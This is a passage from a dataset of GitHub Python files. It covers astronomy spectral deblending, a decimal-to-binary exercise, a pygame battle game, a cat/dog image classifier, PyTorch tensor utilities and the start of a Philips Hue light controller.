listHST_ID[listHST_ID > 0]\n        self.listHST_ID = ['bg'] + list(listHST_ID)\n        self.nbSources = len(self.listHST_ID)  # include background\n\n        # spatial shapes\n        self.nlbda = cube.shape[0]\n        self.shapeLR = cube.shape[1:]\n\n        # load the HR images and filters\n        self.listImagesHR = []\n        filtResp = []\n        lbda = cube.wave.coord()\n        for band, d in conf['hr_bands'].items():\n            imhr = extractHST(Image(d['file']), im)\n            # store the flux conversion factor in the header\n            imhr.primary_header['photflam'] = d.get('photflam', 1)\n            self.listImagesHR.append(imhr)\n\n            if 'filter' in d:\n                filt = load_filter(d['filter'], lbda)\n            else:\n                filt = np.ones(self.nlbda)\n            filtResp.append(filt)\n        self.filtResp = np.array(filtResp)\n\n        self.nBands = self.params.nBands\n        # compute the band limit indices\n        idx = np.linspace(0, self.nlbda, self.nBands + 1, dtype=int)\n        self.idxBands = np.array([idx[:-1], idx[1:]]).T\n\n        # compute the FWHM at the center of each band\n        bands_center = self.cube.wave.coord(self.idxBands.mean(axis=1))\n        self.listFWHM = (self.params.fsf_a_muse +\n                         self.params.fsf_b_muse * bands_center)\n\n        self.PSF_HST = generatePSF_HST(self.params.alpha_hst,\n                                       self.params.beta_hst)\n\n        # for each HST band list all MUSE bands inside it\n        self.listBands = self._getListBands(self.nBands, self.filtResp)\n\n    def _getListBands(self, nBands, filtResp):\n        \"\"\"For each HST 
band, get the list of all MUSE bands inside it (if one\n of the band limits has filter values > 0).\n \"\"\"\n listBands = []\n nl = filtResp.shape[1]\n lind = list(np.linspace(0, nl - 1, nBands + 1, dtype=int))\n for filt in filtResp:\n mask = filt[lind] > 0\n # check if band limits have non-zero values\n bands_idx = np.where(mask[:-1] | mask[1:])\n listBands.append(list(bands_idx[0]))\n return listBands\n\n def createIntensityMap(self):\n \"\"\"Create intensity maps from HST images and segmentation map.\n To be called before calling findSources().\n \"\"\"\n # for each HST filter, create the high resolution intensity matrix\n # (nbSources x Nb pixels)\n self.listIntensityMapHR = [] # [bands, array(sources, im.shape)]\n\n for im in self.listImagesHR:\n # clip image data to avoid negative abundances\n data = np.maximum(im.data, 10**(-9))\n\n intensityMapHR = np.zeros((self.nbSources, np.prod(data.shape)))\n # put intensityMap of background in first position (estimated\n # spectrum of background will also be first)\n intensityMapHR[0] = 1\n\n for k, hst_id in enumerate(self.listHST_ID[1:], start=1):\n mask = self.segmap == hst_id\n arr = np.where(mask, data, 0)\n intensityMapHR[k] = arr.ravel()\n\n self.listIntensityMapHR.append(intensityMapHR)\n\n def findSources(self, store=False):\n \"\"\"Main function to estimate sources spectra.\n\n Parameters\n ----------\n store : bool\n store intermediate results\n \"\"\"\n regul = self.params.regul\n filt_w = self.params.filt_w\n cubeLR = self.cube.data.filled(np.ma.median(self.cube.data))\n cubeLRVar = self.cube.var.filled(np.ma.median(self.cube.var))\n\n if regul:\n # precompute continuum\n cubeLR_c = median_filter(cubeLR, size=(filt_w, 1, 1),\n mode='reflect')\n\n # compute HST-MUSE transfer functions for all MUSE FSF fwhm considered\n self.listTransferKernel = self._generateHSTMUSE_transfer_PSF()\n\n shapeLR = (self.nbSources, self.nlbda)\n\n # Lists of [HR band, Spectral band]\n nbImagesHR = len(self.listImagesHR)\n\n def _create_result_list():\n return [[None] * self.nBands for _ in range(nbImagesHR)]\n\n tmp_sources = []\n tmp_var = []\n self.listIntensityMapLRConvol = _create_result_list()\n self.listAlphas = _create_result_list()\n self.listRSS = _create_result_list()\n self.listCorrFlux = _create_result_list()\n\n if store:\n self.listMask = _create_result_list()\n self.listccoeff = _create_result_list()\n self.listlcoeff = _create_result_list()\n self.listY = _create_result_list()\n self.listYc = _create_result_list()\n self.listYl = _create_result_list()\n self.spatialMask = _create_result_list()\n\n # If there are several HR images the process is applied on each image\n # and then the estimated spectra are combined using a mean weighted by\n # the response filters\n for j in range(nbImagesHR):\n tmp_sources.append(np.zeros(shapeLR))\n tmp_var.append(np.zeros(shapeLR))\n\n for i, (imin, imax) in enumerate(self.idxBands):\n\n # Do the estimation only if MUSE band is in HST band\n if i in self.listBands[j]:\n # Create intensity maps at MUSE resolution\n intensityMapLRConvol = convertIntensityMap(\n self.listIntensityMapHR[j],\n self.cube[0],\n self.listImagesHR[j],\n self.listFWHM[i],\n self.params.fsf_beta_muse,\n self.listTransferKernel[i]\n )\n\n # truncate intensity map support after convolution using\n # alpha_cut\n supp = getMainSupport(\n intensityMapLRConvol[1:], alpha=self.params.alpha_cut)\n intensityMapLRConvol[1:][~supp] = 0\n\n # put ones everywhere for background intensity map\n intensityMapLRConvol[0] = 1.\n\n # U : n x k 
(n number of pixels, k number of objects,\n                    # lmbda number of wavelengths)\n                    # Y : n x lmbda\n                    # Yvar : n x lmbda\n\n                    delta = imax - imin\n                    U = intensityMapLRConvol.T\n                    Y = cubeLR[imin:imax].reshape(delta, -1).T\n                    if regul:\n                        Y_c = cubeLR_c[imin:imax].reshape(delta, -1).T\n                    Yvar = cubeLRVar[imin:imax].reshape(delta, -1).T\n\n                    # normalize intensity maps in flux to get flux-calibrated\n                    # estimated spectra\n                    U /= np.sum(U, axis=0)\n\n                    if regul:  # apply regularization\n\n                        # remove the background from the intensity matrix, as\n                        # the intercept is used instead\n                        U_ = U[:, 1:]\n\n                        # generate support: U.shape = (image size, nsources)\n                        support = np.zeros(U.shape[0], dtype=bool)\n                        for u in range(U_.shape[1]):\n                            support[U_[:, u] > 0.1 * np.max(U_[:, u])] = True\n\n                        # Y_sig2 = np.var(Y[~support, :], axis=0)\n                        Y_sig2 = np.mean(Yvar, axis=0)\n\n                        res = regulDeblendFunc(U_, Y, Y_c=Y_c, support=support,\n                                               Y_sig2=Y_sig2, filt_w=filt_w)\n                        # res -> (res, intercepts, listMask, c_coeff, l_coeff,\n                        # Y, Y_l, Y_c, c_alphas, listRSS, listA)\n\n                        # get the spectra estimation\n                        tmp_sources[j][1:, imin:imax] = res[0]\n                        # for the background spectrum get the intercept (multiply\n                        # by the number of pixels to get the total flux)\n                        tmp_sources[j][0, imin:imax] = res[1] * U.shape[0]\n\n                        # store all elements for checking purposes\n                        self.listAlphas[j][i] = res[8]\n                        self.listRSS[j][i] = res[9]\n                        self.listCorrFlux[j][i] = res[10]\n                        if store:\n                            self.spatialMask[j][i] = support\n                            self.listMask[j][i] = res[2]\n                            self.listccoeff[j][i] = res[3]\n                            self.listlcoeff[j][i] = res[4]\n                            self.listY[j][i] = res[5]\n                            self.listYl[j][i] = res[6]\n                            self.listYc[j][i] = res[7]\n\n                    else:  # use the classical least squares solution\n                        tmp_sources[j][:, imin:imax] = np.linalg.lstsq(U, Y, rcond=None)[0]\n\n                    # get the spectra variance: as the spectra are obtained by\n                    # (U^T.U)^(-1).U^T.Y,\n                    # the variance of the estimated spectra is obtained by\n                    # (U^T.U)^(-1).Yvar\n                    Uinv = np.linalg.pinv(U)\n                    tmp_var[j][:, imin:imax] = np.dot(Uinv**2, Yvar)\n\n                    self.listIntensityMapLRConvol[j][i] = intensityMapLRConvol\n                else:\n                    self.listIntensityMapLRConvol[j][i] = np.zeros(\n                        (self.nbSources, self.shapeLR[0] * self.shapeLR[1]))\n\n        self._combineSpectra(tmp_sources, tmp_var)\n        # keep the estimated cube before the continuum version is built, so the\n        # residuals are computed against the full estimate\n        self.estimatedCube = self._rebuildCube(tmp_sources)\n        self._getContinuumCube(tmp_sources)\n        self._getResiduals()\n\n    def _generateHSTMUSE_transfer_PSF(self):\n        \"\"\"Generate the HST to MUSE transfer PSF, for each spectral band.\"\"\"\n        hst = self.listImagesHR[0]\n        dy, dx = hst.get_step(unit=units.arcsec)\n\n        # get an odd shape\n        shape_1 = np.array(hst.shape) // 2 * 2 + 1\n        center = shape_1 // 2\n\n        # Build the \"distances to center\" matrix.\n        ind = np.indices(shape_1)\n        rsq = ((ind[0] - center[0]) * dx)**2 + ((ind[1] - center[1]) * dy)**2\n\n        # Build the HST FSF\n        asq_hst = self.params.fwhm_hst**2 / 4.0 / \\\n            (2.0**(1.0 / self.params.beta_hst) - 1.0)\n        psf_hst = 1.0 / (1.0 + rsq / asq_hst)**self.params.beta_hst\n        psf_hst /= psf_hst.sum()\n        # FIXME: use Moffat(rsq, asq_hst, self.params.beta_hst) ?\n\n        listTransferKernel = []\n        for fwhm in self.listFWHM:\n            # Build the MUSE FSF\n            asq = fwhm ** 2 / 4.0 / (\n                2.0 ** (1.0 / self.params.fsf_beta_muse) - 1.0)\n            im_muse = 1.0 / (1.0 + rsq / asq) ** self.params.fsf_beta_muse\n            im_muse /= im_muse.sum()\n            listTransferKernel.append(getBlurKernel(\n                imHR=psf_hst, imLR=im_muse, sizeKer=(21, 21)))\n        return listTransferKernel\n\n    def _combineSpectra(self, tmp_sources, tmp_var):\n        \"\"\"Combine spectra estimated on each HST image.\"\"\"\n
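        # weighted mean over the HST filters; bands with zero total response are masked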
\n        weigthTot = np.ma.masked_values(self.filtResp.sum(axis=0), 0)\n        self.sources = np.sum(self.filtResp[:, None, :] * tmp_sources,\n                              axis=0) / weigthTot\n        self.varSources = np.sum(self.filtResp[:, None, :] * tmp_var,\n                                 axis=0) / weigthTot\n\n        # for background, get voxel mean instead of sum\n        self.sources[0] /= self.cube.data.size\n        self.varSources[0] /= self.cube.data.size\n\n    def _rebuildCube(self, tmp_sources):\n        \"\"\"Create and return the estimated cube.\n\n        We have to work on each MUSE spectral bin as the spatial\n        distribution is different in each bin.\n        \"\"\"\n        estimatedCube = np.zeros((self.nlbda, np.prod(self.shapeLR)))\n        weigthTot = np.ma.masked_values(self.filtResp.sum(axis=0), 0)\n        filtResp = self.filtResp / weigthTot\n\n        for i, (imin, imax) in enumerate(self.idxBands):\n            estim = []\n            for j, resp in enumerate(filtResp):\n                arr = np.dot(tmp_sources[j][:, imin:imax].T,\n                             self.listIntensityMapLRConvol[j][i])\n                arr *= resp[imin:imax][:, np.newaxis]\n                estim.append(arr)\n\n            estimatedCube[imin:imax, :] = np.sum(estim, axis=0)\n\n        # return the cube instead of storing it, so that rebuilding the\n        # continuum version does not clobber self.estimatedCube\n        cube = self.cube.clone()\n        cube.data = estimatedCube.reshape(self.cube.shape)\n        return cube\n\n    def _getResiduals(self):\n        self.residuals = self.cube.data - self.estimatedCube.data\n\n    def _getContinuumCube(self, tmp_sources, w=101):\n        \"\"\"\n        Build the continuum cube by median filtering (much faster here as it\n        is done on object spectra instead of all pixel spectra).\n        \"\"\"\n        self.sourcesCont = ssl.medfilt(self.sources, kernel_size=(1, w))\n        self.tmp_sourcesCont = [ssl.medfilt(tmp_source, kernel_size=(1, w))\n                                for tmp_source in tmp_sources]\n        self.estimatedCubeCont = self._rebuildCube(self.tmp_sourcesCont)\n\n    @property\n    def Xi2_tot(self):\n        return (1 / (self.residuals.size - 3) *\n                np.sum(self.residuals**2 / self.cube.var))\n\n    def calcXi2_source(self, k):\n        mask = self.listIntensityMapLRConvol[0][0][k].reshape(self.shapeLR) > 0\n        return (1 / (self.residuals[:, mask].size - 3) *\n                np.sum(self.residuals[:, mask]**2 / self.cube.var[:, mask]))\n\n    def calcCondNumber(self, listobj=None):\n        \"\"\"Compute the condition number of the intensity maps.\"\"\"\n        if listobj is None:\n            mat = np.array(self.listIntensityMapLRConvol[0][0][1:])\n        else:\n            mat = np.array(self.listIntensityMapLRConvol[0][0][listobj][1:])\n\n        mat /= mat.sum(axis=1)[:, None]\n        return np.linalg.cond(mat)\n\n    def write(self, outfile, conf, timestamp):\n        group = self.group\n        origin = ('Odhin', __version__, self.cube.filename,\n                  self.cube.primary_header.get('CUBE_V', ''))\n        src = Source.from_data(group.ID, group.region.ra, group.region.dec,\n                               origin=origin)\n\n        idxSources = [k for k, iden in enumerate(self.listHST_ID)\n                      if iden in group.listSources]\n        cond_number = self.calcCondNumber(idxSources)\n        src.header['GRP_ID'] = group.ID\n        src.header['GRP_AREA'] = group.region.area\n        src.header['GRP_NSRC'] = group.nbSources\n        src.header['COND_NB'] = cond_number\n        src.header['XI2_TOT'] = self.Xi2_tot\n\n        # we add a timestamp which makes it possible to check that the sources\n        # are consistent with a given catalog\n        src.header['ODH_TS'] = timestamp\n\n        # add spectra from objects in the blob\n        for k, iden in enumerate(self.listHST_ID):\n            if iden in group.listSources:\n                sp = Spectrum(data=self.sources[k], var=self.varSources[k],\n                              wave=self.cube.wave, copy=False)\n                src.spectra[iden] = sp\n\n        # build the sources table\n        ids = [f'bg_{group.ID}' if id_ == 'bg' else id_\n               for id_ in self.listHST_ID]\n        rows = [(ids[k], group.ID, self.calcXi2_source(k))\n                for k in idxSources]\n        t = Table(rows=rows, names=('id', 'group_id', 'xi2'))\n        t['group_area'] = group.region.area\n        t['nb_sources'] = group.nbSources\n        t['condition_number'] = cond_number\n        t['xi2_group'] = 
self.Xi2_tot\n        src.tables['sources'] = t\n\n        # save cubes and images\n        src.cubes['MUSE'] = self.cube\n        src.cubes['FITTED'] = self.estimatedCube\n\n        src.images['MUSE_WHITE'] = self.cube.mean(axis=0)\n        src.images['FITTED'] = self.estimatedCube.mean(axis=0)\n        src.images['LABEL'] = self.imLabel\n\n        # save params\n        src.header.add_comment('')\n        src.header.add_comment('ODHIN PARAMETERS:')\n        src.header.add_comment('')\n        for line in yaml.dump(conf).splitlines():\n            src.header.add_comment(line)\n\n        src.write(outfile)\n","repo_name":"musevlt/odhin","sub_path":"odhin/deblend.py","file_name":"deblend.py","file_ext":"py","file_size_in_byte":18558,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"11819198829","text":"# Write a program that converts a decimal number to binary.\n\n# Example:\n\n# - 45 -> 101101\n# - 3 -> 11\n# - 2 -> 10\n\nnumber = int(input(\"Enter a number in decimal notation: \"))\n\nif number == 0:\n    print(0)\nelse:\n    line = \"\"\n    while number > 1:\n        rest = str(number % 2)\n        number = number // 2\n        line += rest\n    number = str(number)\n    line += number  # the final quotient (always 1 here) becomes the leading bit\n    print(int(''.join(reversed(line))))","repo_name":"ggscream/python_homework_3","sub_path":"Task_4.py","file_name":"Task_4.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"19703957520","text":"from settings import *\r\nimport pygame, random\r\nfrom enemy import Enemy\r\nfrom healtbar import Healtbar\r\nfrom knight import Knight\r\nfrom buttons import Buttons\r\nfrom pygame import mixer\r\npygame.init()\r\nmixer.init()\r\n# load the background image\r\nbg = pygame.image.load('bg_forest.png')\r\n\r\n\r\n# assignments\r\nenemy1 = Enemy(500, screen_height - panel - 62, \"LightBandit\", \"Bandit\", 100, 10, 1)\r\nenemy2 = Enemy(600, screen_height - panel - 62, \"LightBandit\", \"Bandit\", 100, 10, 1)\r\nchar = Knight(100, screen_height - panel - 62, \"Knight\", 100, 25, 3)\r\nhp_bar_char = Healtbar(106, screen_height - panel + 40, char.hp, char.max_hp)\r\nhp_bar_enemy1 = Healtbar(525, screen_height - panel + 40, enemy1.hp, enemy1.max_hp)\r\nhp_bar_enemy2 = Healtbar(525, screen_height - panel + 110, enemy2.hp, enemy2.max_hp)\r\nbuttons = Buttons(15, screen_height - 33)\r\ndamage_deal_group = pygame.sprite.Group()\r\nmixer.music.load(\"pokemon_song.mp3\")\r\nmixer.music.set_volume(0.05)\r\ngame_over = False\r\n\r\n\r\ndef font(win, text, color, pos):\r\n    text = char_font.render(text, True, color)\r\n    win.blit(text, pos)\r\n\r\n\r\ndef draw(win):\r\n    win.blit(bg, (0, 0))\r\n    pygame.draw.rect(win, \"sienna4\", pygame.Rect(0, screen_height - panel, screen_width // 2, panel))\r\n    pygame.draw.rect(win, \"sienna4\", pygame.Rect(screen_width // 2, screen_height - panel, screen_width // 2, panel))\r\n    pygame.draw.line(win, \"black\", (screen_width // 2, screen_height - panel), (screen_width // 2, screen_height), 6)\r\n    char.draw(win)\r\n    enemy1.draw(win)\r\n    enemy2.draw(win)\r\n    char.update()\r\n    enemy1.update()\r\n    enemy2.update()\r\n    # text\r\n    font(win, f'{char.name} HP: {char.hp}', \"yellow\", [140, screen_height - panel])\r\n    font(win, f'{enemy1.name} HP: {enemy1.hp}', \"orange\", [560, screen_height - panel])\r\n    font(win, f'{enemy2.name} HP: {enemy2.hp}', \"orange\", [560, screen_height - panel + 74])\r\n    # HP bars\r\n    hp_bar_char.draw(char.hp)\r\n    hp_bar_enemy1.draw(enemy1.hp)\r\n    hp_bar_enemy2.draw(enemy2.hp)\r\n    # buttons\r\n    buttons.draw(win)\r\n    # damage\r\n\r\n    # screen update\r\n    pygame.display.update()\r\n    clock.tick(FPS)\r\n\r\nrunning = True\r\n
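\r\n# start the background music once, then run the main loop: draw, handle events, alternate turns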
True\r\n\r\nif not game_over:\r\n mixer.music.play()\r\nwhile running:\r\n\r\n keys = pygame.key.get_pressed()\r\n draw(WIN)\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n running = False\r\n\r\n\r\n\r\n if not game_over:\r\n\r\n\r\n if enemy1.alive and enemy2.alive and char.turn and not enemy1.turn and not enemy2.turn:\r\n if enemy1.alive and enemy2.alive:\r\n random_list = [enemy1, enemy2]\r\n buttons.click(char, random.choice(random_list),enemy1,enemy2)\r\n\r\n if enemy1.alive:\r\n buttons.pot(char)\r\n\r\n if enemy2.alive:\r\n buttons.pot(char)\r\n\r\n if enemy1.turn or enemy2.turn:\r\n buttons.pot_used = False\r\n buttons.y_heal = screen_height - panel - 180\r\n if enemy1.alive == False and char.turn:\r\n buttons.click(char, enemy2,enemy1,enemy2)\r\n\r\n elif enemy2.alive == False and char.turn:\r\n buttons.click(char, enemy1,enemy1,enemy2)\r\n\r\n if not char.turn:\r\n if char.alive:\r\n if enemy1.turn and enemy1.alive and not char.turn:\r\n enemy1.attack(char,char.rect.right -120 ,500)\r\n if enemy1.turn == False:\r\n if enemy2.alive == False:\r\n char.turn = True\r\n else:\r\n enemy2.turn = True\r\n if enemy1.alive == False:\r\n enemy2.turn = True\r\n if enemy2.turn and not char.turn and enemy2.alive:\r\n enemy2.attack(char, char.rect.right - 120 ,600)\r\n if enemy2.turn == False:\r\n char.turn = True\r\n\r\n if enemy1.alive == False and enemy2.alive == False:\r\n game_over = True\r\n\r\n elif char.alive == False:\r\n game_over = True\r\n\r\n\r\npygame.quit()\r\n\r\n","repo_name":"MiyazakiMehmet/darkest-dungeron-walter-white-edition","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71581327122","text":"import asyncio\nimport numpy as np\nimport os\nimport cv2\nfrom tqdm import tqdm\nimport random\nimport tensorflow as tf\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Activation, Flatten\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D\n\nDATADIR = \"PetImages\"\nCATEGORIES = [\"Dog\", \"Cat\"]\nIMG_SIZE = 100\n\n\nclass Accuracy:\n def __init__(self, acc: float, category):\n \"\"\"Se la categoria è `gatto` allora la percentuale rimarrà la stessa\n Invece, se è `cane` allora deve essere invertita la percentuale\"\"\"\n self.cat = acc if category == \"Cat\" else 1 - acc\n self.dog = acc if category == \"Cat\" else 1 - acc\n\n\n# per scaricare il dataset vai su:\n# https://www.microsoft.com/en-us/download/confirmation.aspx?id=54765\n\n\ndef prepare_data(filepath):\n img_array = cv2.imread(\n filepath, cv2.IMREAD_GRAYSCALE\n ) # legge l'immagine e la converte in scala grigi\n new_array = cv2.resize(\n img_array, (IMG_SIZE, IMG_SIZE)\n ) # ridimensiona l'immagine per ottenere le dimensioni che si aspetta il modello\n return new_array.reshape(\n -1, IMG_SIZE, IMG_SIZE, 1\n ) # ritorna l'immagine con la forma che si aspetta il modello\n\n\ndef create_training_data():\n training_data = []\n for category in CATEGORIES: # cani e gatti\n path = os.path.join(DATADIR, category) # crea un percorso ai cani e gatti\n class_num = CATEGORIES.index(\n category\n ) # ricevi una classificazione (0 o 1). 
0=cane 1=gatto\n for img in tqdm(os.listdir(path)): # itera per ogni immagine di cani e gatti\n try:\n img_array = cv2.imread(\n os.path.join(path, img), cv2.IMREAD_GRAYSCALE\n ) # converti in array\n new_array = cv2.resize(\n img_array, (IMG_SIZE, IMG_SIZE)\n ) # normalizza i dati\n training_data.append(\n [new_array, class_num]\n ) # aggiungi ai dati di allenamento\n except Exception as e: # meglio prevenire che curare\n pass\n random.shuffle(\n training_data\n ) # mischia i dati per evitare che il modello venga allenato male\n return training_data\n\n\ndef train():\n x = []\n y = []\n for features, label in create_training_data():\n x.append(features)\n y.append(label)\n x = np.array(x).reshape(-1, IMG_SIZE, IMG_SIZE, 1)\n x = x / 255.0\n x = np.array(x) # bisogna ricreare l'array\n y = np.array(y)\n model = Sequential()\n model.add(Conv2D(64, (3, 3), input_shape=x.shape[1:]))\n model.add(Activation(\"relu\"))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n # 3 conv layers -- START --\n # 1:\n model.add(Conv2D(64, (3, 3)))\n model.add(Activation(\"relu\"))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n # 2:\n model.add(Conv2D(64, (3, 3)))\n model.add(Activation(\"relu\"))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n # 3:\n model.add(Conv2D(64, (3, 3)))\n model.add(Activation(\"relu\"))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n # 3 conv layers -- END --\n model.add(\n Flatten()\n ) # questo converte la nostra mappa delle feature in 3D ad un vettore di feature in 1D\n model.add(Dense(1))\n model.add(Activation(\"sigmoid\"))\n model.compile(loss=\"binary_crossentropy\", optimizer=\"adam\", metrics=[\"accuracy\"])\n model.fit(x, y, batch_size=32, epochs=10)\n model.save(\"cat_or_dog.model\")\n return model\n\n\ndef get_model():\n if not os.path.exists(\"cat_or_dog.model\"):\n model = train()\n else:\n model = tf.keras.models.load_model(\"cat_or_dog.model\")\n return model\n\n\ndef predict(model: Sequential, filepath):\n prediction = model.predict([prepare_data(filepath)])\n category = CATEGORIES[round(prediction[0][0])]\n return category, Accuracy(prediction[0][0], category)\n\n\n# test\ndef test():\n model = get_model()\n prediction = predict(model, \"./dog_0.jpg\")\n print(f\"Type expected: Dog; Acc: {prediction[1].dog * 100: .2f}%\")\n prediction = predict(model, \"./cat_0.jpg\")\n print(f\"Type expected: Cat; Acc: {prediction[1].cat * 100: .2f}%\")\n\n\nif __name__ == \"__main__\":\n loop = asyncio.get_event_loop()\n loop.run_until_complete(test())\n","repo_name":"Enn3Developer/cat_or_dog","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4287,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"25732180109","text":"import random\nfrom typing import List\nfrom typing import overload\nfrom typing import Tuple\n\nimport numpy\nimport torch\n\n\ndef tensor_is_empty(x: torch.Tensor) -> bool:\n \"\"\"Return whether the tensor is empty.\"\"\"\n return 0 in x.shape\n\n\ndef same_storage(\n x: torch.Tensor, y: torch.Tensor, empty_does_not_share_storage: bool = True\n) -> bool:\n \"\"\"Checks if two tensors share storage.\n\n :param x: first tensor\n :param y: second tensor\n :param empty_does_not_share_storage: if True (default), will return False if\n either tensor is empty (despite that they technically data_ptr are the same).\n :return: if the tensor shares the same storage\n \"\"\"\n if empty_does_not_share_storage and (tensor_is_empty(x) or tensor_is_empty(y)):\n return False\n x_ptrs = 
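same_storage above detects aliasing by comparing sets of element data_ptr values. The core observation fits in a few lines: views reinterpret the same buffer, clones allocate a new one.

    import torch

    a = torch.arange(6)
    view = a.view(2, 3)   # reinterprets the same underlying buffer
    copy = a.clone()      # allocates independent storage
    print(a.data_ptr() == view.data_ptr())  # True: same first element
    print(a.data_ptr() == copy.data_ptr())  # False: separate memory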
{e.data_ptr() for e in x.flatten()}\n y_ptrs = {e.data_ptr() for e in y.flatten()}\n return (x_ptrs <= y_ptrs) or (y_ptrs <= x_ptrs)\n\n\ndef deterministic_seed(seed: int, cudnn_deterministic: bool = False):\n random.seed(seed)\n numpy.random.seed(seed)\n torch.manual_seed(seed)\n if cudnn_deterministic:\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\n\n@overload\ndef to_one_hot(arr: numpy.ndarray, mx: int) -> numpy.ndarray:\n ...\n\n\ndef to_one_hot(arr: torch.tensor, mx: int) -> torch.tensor:\n if torch.is_tensor(arr):\n\n oh = torch.zeros((arr.shape[0], mx))\n else:\n oh = numpy.zeros((arr.shape[0], mx))\n for i, a in enumerate(arr):\n oh[i, a] = 1.0\n return oh\n\n\ndef stable_arg_sort(arr, mn: float, mx: float):\n dim = -1\n if not dim == -1:\n raise ValueError(\"only last dimension sort is supported. Try reshaping tensor.\")\n delta_shape = list(arr.shape)\n delta_shape[dim] = 1\n delta = torch.linspace(mn, mx, arr.shape[dim], device=arr.device)\n delta = delta.repeat(delta_shape)\n return torch.argsort(arr + delta, dim=dim)\n\n\ndef stable_arg_sort_long(arr):\n \"\"\"Stable sort of long tensors.\n\n Note that Pytorch 1.5.0 does not have a stable sort implementation.\n Here we simply add a delta value between 0 and 1 (exclusive) and\n assuming we are using integers, call torch.argsort to get a stable\n sort.\n \"\"\"\n if not (arr.dtype == torch.long or arr.dtype == torch.int):\n raise ValueError(\"only torch.Long or torch.Int allowed\")\n return stable_arg_sort(arr, 0.0, 0.99)\n\n\ndef torch_scatter_group(\n x: torch.Tensor, idx: torch.Tensor\n) -> Tuple[torch.Tensor, List[torch.Tensor]]:\n \"\"\"Group a tensor by indices. This is equivalent to successive applications\n of `x[torch.where(x == index)]` for all provided sorted indices.\n\n Example:\n\n .. code-block::\n\n idx = torch.tensor([2, 2, 0, 1, 1, 1, 2])\n x = torch.tensor([0, 1, 2, 3, 4, 5, 6])\n\n uniq_sorted_idx, out = scatter_group(x, idx)\n\n # node the idx is sorted\n assert torch.all(torch.eq(out[0], torch.tensor([0, 1, 2])))\n\n # where idx == 0\n assert torch.all(torch.eq(out[1][0], torch.tensor([2])))\n\n # where idx == 1\n assert torch.all(torch.eq(out[1][1], torch.tensor([3, 4, 5])))\n\n # where idx == 2\n assert torch.all(torch.eq(out[1][2], torch.tensor([0, 1, 6])))\n\n :param x: tensor to group\n :param idx: indices\n :return: tuple of unique, sorted indices and a list of tensors corresponding to the groups\n \"\"\"\n arg = stable_arg_sort_long(idx)\n x = x[arg]\n groups, b = torch.unique(idx, return_counts=True)\n i_a = 0\n arr_list = []\n for i_b in b:\n arr_list.append(x[i_a : i_a + i_b.item()])\n i_a += i_b.item()\n return groups, arr_list\n\n\ndef long_isin(ar1, ar2, assume_unique: bool = False, invert: bool = False):\n dim = -1\n if ar1.dtype != torch.long or ar2.dtype != torch.long:\n raise ValueError(\"Arrays be torch.LongTensor\")\n if ar2.ndim > 1:\n raise ValueError(\n \"Unable to broadcast shape {}. 
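stable_arg_sort makes torch.argsort stable on integer inputs by adding a strictly increasing sub-integer offset, so tied values keep their original order. A small demonstration of the trick (note that recent PyTorch releases also expose a stable=True flag on torch.sort):

    import torch

    idx = torch.tensor([2, 2, 0, 1, 1, 1, 2])
    delta = torch.linspace(0.0, 0.99, idx.shape[-1])
    order = torch.argsort(idx + delta)  # ties broken by original position
    print(order)  # tensor([2, 3, 4, 5, 0, 1, 6])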
Second tensor must be a \"\n \"1-dimensional.\".format(ar2.shape)\n )\n\n # Otherwise use sorting\n if not assume_unique:\n ar1, rev_idx = torch.unique(ar1, return_inverse=True)\n ar2 = torch.unique(ar2, dim=None)\n # TODO: how to handle repeats and unique in multidimensional tensor?\n\n # if ar2.ndim > 1:\n # s = list(ar2.shape)\n # s[dim] = 1\n # ar1 = ar1.repeat(s)\n ar = torch.cat((ar1, ar2), axis=dim)\n\n # We need this to be a stable sort\n order = stable_arg_sort_long(ar)\n sar = torch.gather(ar, dim, order)\n if invert:\n bool_ar = sar[1:] != sar[:-1]\n else:\n bool_ar = sar[1:] == sar[:-1]\n flag = torch.cat((bool_ar, torch.tensor([invert])))\n ret = torch.empty(ar.shape, dtype=bool)\n ret[order] = flag\n\n if assume_unique:\n return ret[: len(ar1)]\n else:\n return ret[rev_idx]\n","repo_name":"jvrana/caldera","sub_path":"caldera/utils/tensor.py","file_name":"tensor.py","file_ext":"py","file_size_in_byte":4849,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"12817199587","text":"import requests\nimport json\n\n\n# REFERENCE: https://developers.meethue.com/develop/get-started-2/\nclass HueController(object):\n def __init__(self):\n self.user = '7wl8U1CnKZlk6kE8WHPzCQatw5VqWb0oiqjZFinR'\n self.api_base = f'http://192.168.1.4/api/{self.user}'\n self.group_map = {}\n self.light_map = {}\n self.group_aliases = {\n 'Lamp': [\n 'living room',\n 'livingroom',\n 'lamp'\n ],\n 'Bedroom': [\n 'bed room',\n 'bedroom',\n 'master bedroom',\n 'master bed room'\n ],\n 'Craft Room': [\n 'office',\n 'craftroom',\n 'craft room'\n ]\n }\n self._init_states()\n\n def _init_states(self):\n groups = self.get_groups()\n if groups.status_code != 200:\n print(f'Cannot reach Hue bridge at {self._build_url([\"groups\"])}')\n exit(1)\n for id, group in groups.json().items():\n self.group_map[group['name']] = id\n lights = self.get_lights()\n if lights.status_code != 200:\n print(f'Cannot reach Hue bridge at {self._build_url([\"lights\"])}')\n exit(1)\n for id, light in lights.json().items():\n self.light_map[light['name']] = id\n\n def _build_url(self, parts: list) -> str:\n return '/'.join([self.api_base, *parts])\n\n def _clamp_brightness(self, bright: int) -> int:\n return max(0, min(int(254 * (bright / 100)), 254))\n\n def get_lights(self) -> requests.Response:\n return requests.get(\n url=self._build_url(['lights'])\n )\n\n def _get_light_id(self, name: 